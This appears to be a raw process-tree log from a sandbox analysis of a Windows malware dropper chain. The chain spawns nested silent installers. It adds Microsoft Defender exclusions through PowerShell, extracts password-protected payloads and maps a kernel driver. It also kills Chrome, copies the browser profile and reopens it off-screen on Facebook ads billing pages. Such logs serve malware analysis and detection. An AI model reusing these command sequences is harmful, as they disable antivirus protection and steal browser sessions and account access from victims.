C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1452,16549990699203792240,16819712764247144360,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3764 /prefetch:136⤵PID:1404
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xdqhkhic.gj1\customer4.exe & exit33⤵PID:14828
-
C:\Users\Admin\AppData\Local\Temp\xdqhkhic.gj1\customer4.exeC:\Users\Admin\AppData\Local\Temp\xdqhkhic.gj1\customer4.exe34⤵PID:15040
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"35⤵PID:15220
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yrwpj5ut.qit\GcleanerWW.exe /mixone & exit33⤵PID:15272
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uziran2p.ysu\privacytools5.exe & exit33⤵PID:12004
-
C:\Users\Admin\AppData\Local\Temp\uziran2p.ysu\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\uziran2p.ysu\privacytools5.exe34⤵PID:12140
-
C:\Users\Admin\AppData\Local\Temp\uziran2p.ysu\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\uziran2p.ysu\privacytools5.exe35⤵PID:11604
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\airyymra.op2\setup.exe /8-2222 & exit33⤵PID:9068
-
C:\Users\Admin\AppData\Local\Temp\airyymra.op2\setup.exeC:\Users\Admin\AppData\Local\Temp\airyymra.op2\setup.exe /8-222234⤵PID:10384
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Restless-Grass"35⤵PID:8564
-
-
C:\Program Files (x86)\Restless-Grass\7za.exe"C:\Program Files (x86)\Restless-Grass\7za.exe" e -p154.61.71.51 winamp-plugins.7z35⤵PID:12636
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Restless-Grass\setup.exe" -map "C:\Program Files (x86)\Restless-Grass\WinmonProcessMonitor.sys""35⤵PID:13100
-
C:\Program Files (x86)\Restless-Grass\setup.exe"C:\Program Files (x86)\Restless-Grass\setup.exe" -map "C:\Program Files (x86)\Restless-Grass\WinmonProcessMonitor.sys"36⤵PID:1964
-
-
-
C:\Program Files (x86)\Restless-Grass\7za.exe"C:\Program Files (x86)\Restless-Grass\7za.exe" e -p154.61.71.51 winamp.7z35⤵PID:14628
-
-
C:\Program Files (x86)\Restless-Grass\setup.exe"C:\Program Files (x86)\Restless-Grass\setup.exe" /8-222235⤵PID:14700
-
C:\Program Files (x86)\Restless-Grass\setup.exe"C:\Program Files (x86)\Restless-Grass\setup.exe" /8-222236⤵PID:11728
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cbdzsll4.ete\MultitimerFour.exe & exit33⤵PID:7568
-
C:\Users\Admin\AppData\Local\Temp\cbdzsll4.ete\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\cbdzsll4.ete\MultitimerFour.exe34⤵PID:9960
-
C:\Users\Admin\AppData\Local\Temp\ZQMKYS2MVH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZQMKYS2MVH\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10435⤵PID:12724
-
C:\Users\Admin\AppData\Local\Temp\ZQMKYS2MVH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZQMKYS2MVH\multitimer.exe" 1 3.1615354111.604858ff42696 10436⤵PID:14200
-
C:\Users\Admin\AppData\Local\Temp\ZQMKYS2MVH\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\ZQMKYS2MVH\multitimer.exe" 2 3.1615354111.604858ff4269637⤵PID:8312
-
C:\Users\Admin\AppData\Local\Temp\ihswabyptti\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\ihswabyptti\askinstall24.exe"38⤵PID:13460
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe39⤵PID:15048
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe40⤵
- Kills process with taskkill
PID:7448
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y39⤵PID:14812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/39⤵PID:672
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffaee066e00,0x7ffaee066e10,0x7ffaee066e2040⤵PID:8520
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1700 /prefetch:840⤵PID:6868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1652 /prefetch:240⤵PID:7920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2224 /prefetch:840⤵PID:12628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2812 /prefetch:140⤵PID:7568
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2804 /prefetch:140⤵PID:8828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:140⤵PID:6344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:140⤵PID:5440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:140⤵PID:11436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:140⤵PID:11536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:140⤵PID:14188
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:140⤵PID:14376
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4856 /prefetch:140⤵PID:14224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1640,14249828038502947667,1856664521103012103,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2232 /prefetch:840⤵PID:13124
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\grslpt0ftab\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\grslpt0ftab\Setup3310.exe" /Verysilent /subid=57738⤵PID:14400
-
C:\Users\Admin\AppData\Local\Temp\is-UE837.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-UE837.tmp\Setup3310.tmp" /SL5="$806BC,802346,56832,C:\Users\Admin\AppData\Local\Temp\grslpt0ftab\Setup3310.exe" /Verysilent /subid=57739⤵PID:14760
-
C:\Users\Admin\AppData\Local\Temp\is-K408N.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-K408N.tmp\Setup.exe" /Verysilent40⤵PID:8208
-
C:\Users\Admin\AppData\Local\Temp\is-H5D8V.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-H5D8V.tmp\Setup.tmp" /SL5="$306CE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-K408N.tmp\Setup.exe" /Verysilent41⤵PID:11764
-
C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\Messure.exe"C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\Messure.exe" /Verysilent42⤵PID:2940
-
C:\Users\Admin\AppData\Local\Temp\is-M5PFD.tmp\Messure.tmp"C:\Users\Admin\AppData\Local\Temp\is-M5PFD.tmp\Messure.tmp" /SL5="$306A0,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\Messure.exe" /Verysilent43⤵PID:8016
-
C:\Users\Admin\AppData\Local\Temp\is-0UB26.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-0UB26.tmp\Setup.exe" /VERYSILENT44⤵PID:13220
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\PictureLAb.exe" /Verysilent42⤵PID:9840
-
C:\Users\Admin\AppData\Local\Temp\is-LB6H8.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-LB6H8.tmp\PictureLAb.tmp" /SL5="$406A0,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-PGTJ4.tmp\PictureLAb.exe" /Verysilent43⤵PID:3200
-
C:\Users\Admin\AppData\Local\Temp\is-2TUSM.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2TUSM.tmp\Setup.exe" /VERYSILENT44⤵PID:12464
-
C:\Users\Admin\AppData\Local\Temp\is-CLINC.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-CLINC.tmp\Setup.tmp" /SL5="$407EC,298255,214528,C:\Users\Admin\AppData\Local\Temp\is-2TUSM.tmp\Setup.exe" /VERYSILENT45⤵PID:12456
-
C:\Users\Admin\AppData\Local\Temp\is-MGAHS.tmp\def.exe"C:\Users\Admin\AppData\Local\Temp\is-MGAHS.tmp\def.exe" /S /UID=lab21446⤵PID:14448
-
C:\Users\Admin\AppData\Local\Temp\a5-4b037-0ab-cd79d-774646559868c\Cehihapipae.exe"C:\Users\Admin\AppData\Local\Temp\a5-4b037-0ab-cd79d-774646559868c\Cehihapipae.exe"47⤵PID:4240
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4imhxiex.b2y\md7_7dfj.exe & exit48⤵PID:8376
-
C:\Users\Admin\AppData\Local\Temp\4imhxiex.b2y\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\4imhxiex.b2y\md7_7dfj.exe49⤵PID:11016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a3xysltr.mnj\askinstall18.exe & exit48⤵PID:11972
-
C:\Users\Admin\AppData\Local\Temp\a3xysltr.mnj\askinstall18.exeC:\Users\Admin\AppData\Local\Temp\a3xysltr.mnj\askinstall18.exe49⤵PID:372
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe50⤵PID:13524
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe51⤵
- Kills process with taskkill
PID:8816
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\mfhsghshee99\" /s /e /y50⤵PID:12492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/50⤵PID:8308
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1908 /prefetch:851⤵PID:7004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1896 /prefetch:851⤵PID:14044
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:151⤵PID:5536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2828 /prefetch:151⤵PID:8480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3236 /prefetch:151⤵PID:5016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:151⤵PID:5040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:151⤵PID:14712
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1848 /prefetch:251⤵PID:12168
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:151⤵PID:7680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:151⤵PID:4200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:151⤵PID:11732
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:151⤵PID:11416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=1672 /prefetch:851⤵PID:9380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1836,8377289666456605433,12220222036228273300,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\mfhsghshee99" --mojo-platform-channel-handle=6044 /prefetch:851⤵PID:11768
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zgsu3snm.ju3\customer4.exe & exit48⤵PID:11140
-
C:\Users\Admin\AppData\Local\Temp\zgsu3snm.ju3\customer4.exeC:\Users\Admin\AppData\Local\Temp\zgsu3snm.ju3\customer4.exe49⤵PID:14956
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"50⤵PID:10448
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chryl4fk.p1v\GcleanerWW.exe /mixone & exit48⤵PID:11424
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ukl4qqiz.cot\privacytools5.exe & exit48⤵PID:9236
-
C:\Users\Admin\AppData\Local\Temp\ukl4qqiz.cot\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\ukl4qqiz.cot\privacytools5.exe49⤵PID:10416
-
C:\Users\Admin\AppData\Local\Temp\ukl4qqiz.cot\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\ukl4qqiz.cot\privacytools5.exe50⤵PID:12488
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fktzlgsd.dtu\setup.exe /8-2222 & exit48⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\fktzlgsd.dtu\setup.exeC:\Users\Admin\AppData\Local\Temp\fktzlgsd.dtu\setup.exe /8-222249⤵PID:8360
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Shy-Cloud"50⤵PID:11880
-
-
C:\Program Files (x86)\Shy-Cloud\7za.exe"C:\Program Files (x86)\Shy-Cloud\7za.exe" e -p154.61.71.51 winamp-plugins.7z50⤵PID:12240
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Shy-Cloud\setup.exe" -map "C:\Program Files (x86)\Shy-Cloud\WinmonProcessMonitor.sys""50⤵PID:6080
-
C:\Program Files (x86)\Shy-Cloud\setup.exe"C:\Program Files (x86)\Shy-Cloud\setup.exe" -map "C:\Program Files (x86)\Shy-Cloud\WinmonProcessMonitor.sys"51⤵PID:11784
-
-
-
C:\Program Files (x86)\Shy-Cloud\7za.exe"C:\Program Files (x86)\Shy-Cloud\7za.exe" e -p154.61.71.51 winamp.7z50⤵PID:11464
-
-
C:\Program Files (x86)\Shy-Cloud\setup.exe"C:\Program Files (x86)\Shy-Cloud\setup.exe" /8-222250⤵PID:14564
-
C:\Program Files (x86)\Shy-Cloud\setup.exe"C:\Program Files (x86)\Shy-Cloud\setup.exe" /8-222251⤵PID:12996
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s5eeqspl.e2w\MultitimerFour.exe & exit48⤵PID:12624
-
C:\Users\Admin\AppData\Local\Temp\s5eeqspl.e2w\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\s5eeqspl.e2w\MultitimerFour.exe49⤵PID:12688
-
C:\Users\Admin\AppData\Local\Temp\FY0XCTDDM0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FY0XCTDDM0\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10450⤵PID:12856
-
C:\Users\Admin\AppData\Local\Temp\FY0XCTDDM0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FY0XCTDDM0\multitimer.exe" 1 3.1615354221.6048596d6db15 10451⤵PID:8784
-
C:\Users\Admin\AppData\Local\Temp\FY0XCTDDM0\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\FY0XCTDDM0\multitimer.exe" 2 3.1615354221.6048596d6db1552⤵PID:8168
-
C:\Users\Admin\AppData\Local\Temp\4am4kpt4vzk\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\4am4kpt4vzk\Setup3310.exe" /Verysilent /subid=57753⤵PID:9476
-
C:\Users\Admin\AppData\Local\Temp\is-00DHP.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-00DHP.tmp\Setup3310.tmp" /SL5="$15039C,802346,56832,C:\Users\Admin\AppData\Local\Temp\4am4kpt4vzk\Setup3310.exe" /Verysilent /subid=57754⤵PID:11836
-
C:\Users\Admin\AppData\Local\Temp\is-AC6CD.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AC6CD.tmp\Setup.exe" /Verysilent55⤵PID:14352
-
C:\Users\Admin\AppData\Local\Temp\is-TFJJB.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-TFJJB.tmp\Setup.tmp" /SL5="$A07EA,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-AC6CD.tmp\Setup.exe" /Verysilent56⤵PID:7656
-
C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\Messure.exe"C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\Messure.exe" /Verysilent57⤵PID:4504
-
C:\Users\Admin\AppData\Local\Temp\is-RBO1L.tmp\Messure.tmp"C:\Users\Admin\AppData\Local\Temp\is-RBO1L.tmp\Messure.tmp" /SL5="$40844,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\Messure.exe" /Verysilent58⤵PID:12360
-
C:\Users\Admin\AppData\Local\Temp\is-TI6I8.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-TI6I8.tmp\Setup.exe" /VERYSILENT59⤵PID:6628
-
C:\ProgramData\3GzhBdrEazKFpDWZPQsyJa7TxsUGTNMcb2FDh.tmpC:\ProgramData\3GzhBdrEazKFpDWZPQsyJa7TxsUGTNMcb2FDh.tmp60⤵PID:14824
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-LDO1G.tmp\PictureLAb.exe" /Verysilent57⤵PID:7504
-
